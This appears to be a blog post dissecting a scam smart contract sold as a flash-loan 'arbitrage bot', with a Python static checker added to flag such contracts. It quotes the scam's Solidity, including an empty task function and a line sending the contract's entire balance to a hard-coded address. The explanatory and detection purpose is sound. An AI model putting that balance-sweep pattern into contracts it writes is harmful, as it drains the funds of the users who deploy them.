Anatomy of a Smart Contract Scam

Front-running

Why is a smart contract surprising?

Don’t judge a contract by its cover

I had a look at the code, and at first glance it appeared to be more like an arbitrage automation contract. The main body of the code contained a function called `action()` which looked like it executed a series of commands to:

  • create an ERC20 token,
  • take out a flash loan from Aave,
  • convert half of the loan to DAI tokens,
  • create two swap pools on Pancakeswap for the created token, half with the DAI and half with the remaining ETH from the loan,
  • perform swaps between the pools to profit from something mystical called “self-arbitrage” in a comment in the code,
  • move the profits to the caller's wallet, and
  • repay the flash loan.
```solidity
pragma solidity ^0.5.0;

contract Manager {
    // Named as if it did the "arbitrage" work, but the body is empty.
    function performTasks() public pure {
    }

    // Returns a hard-coded address presented as a "Pancakeswap deposit address".
    function pancakeswapDepositAddress() public pure returns (address) {
        return 0x933B91682E821f50DE20D9cf457a5c883d8bEC43;
    }
}

// pancakeswapfunction
// From the main contract: sends the contract's entire balance to the hard-coded address above.
address(uint160(manager.pancakeswapDepositAddress())).transfer(address(this).balance);
```
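A quick static check a reader could run over pasted "arbitrage bot" source before compiling and funding it. This is an added example, not code from the original post: it flags pure functions that only return a hard-coded address literal, functions with empty bodies, and calls that move the whole contract balance, and reports when a balance sweep targets one of those hard-coded addresses (the pattern in the snippet above). The input is the post's own snippet, joined into one constructed string.

```python
import re

# Constructed sample: the Manager contract and the sweep line quoted in the post.
SAMPLE_SOURCE = """
pragma solidity ^0.5.0;
contract Manager {
    function performTasks() public pure {
    }
    function pancakeswapDepositAddress() public pure returns (address) {
        return 0x933B91682E821f50DE20D9cf457a5c883d8bEC43;
    }
}
//pancakeswapfunction
address(uint160(manager.pancakeswapDepositAddress())).transfer(address(this).balance);
"""

# A function returning `address` whose whole body is `return 0x<40 hex digits>;`.
HARDCODED_ADDR_FN = re.compile(
    r"function\s+(\w+)\s*\([^)]*\)\s*[^{]*?returns\s*\(\s*address\s*\)\s*\{\s*"
    r"return\s+(0x[0-9a-fA-F]{40})\s*;\s*\}", re.S)
# A function whose body is empty (does nothing despite its name).
EMPTY_FN = re.compile(r"function\s+(\w+)\s*\([^)]*\)[^{]*\{\s*\}", re.S)
# A call that moves the entire contract balance somewhere.
SWEEP_BALANCE = re.compile(
    r"\.(transfer|send|call(?:\.value)?)\s*\(\s*address\(this\)\.balance\s*\)")


def find_findings(source: str) -> list:
    """Return (kind, name, detail) tuples for each suspicious construct found."""
    findings = []
    for m in HARDCODED_ADDR_FN.finditer(source):
        findings.append(("hardcoded-address", m.group(1), m.group(2)))
    for m in EMPTY_FN.finditer(source):
        findings.append(("empty-function", m.group(1), ""))
    for kind in SWEEP_BALANCE.findall(source):
        findings.append(("balance-sweep", kind, ""))
    return findings


def suspicious_sweep(source: str) -> bool:
    """True when the whole balance is sent to an address obtained from a
    function that just returns a hard-coded literal."""
    names = [n for kind, n, _ in find_findings(source) if kind == "hardcoded-address"]
    return any(
        re.search(rf"{name}\s*\(\s*\)[^;]*\.(transfer|send|call)[^;]*address\(this\)\.balance", source)
        for name in names)


if __name__ == "__main__":
    for finding in find_findings(SAMPLE_SOURCE):
        print(finding)
    print("sweep to hard-coded address:", suspicious_sweep(SAMPLE_SOURCE))
```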

Conclusion

As scams go, this is an odd one. The mark needs to have enough knowledge to know how to compile a contract, deploy it, and then interact with it without the aid of a web3 website, but not enough knowledge to be able to dig into what is going on underneath.
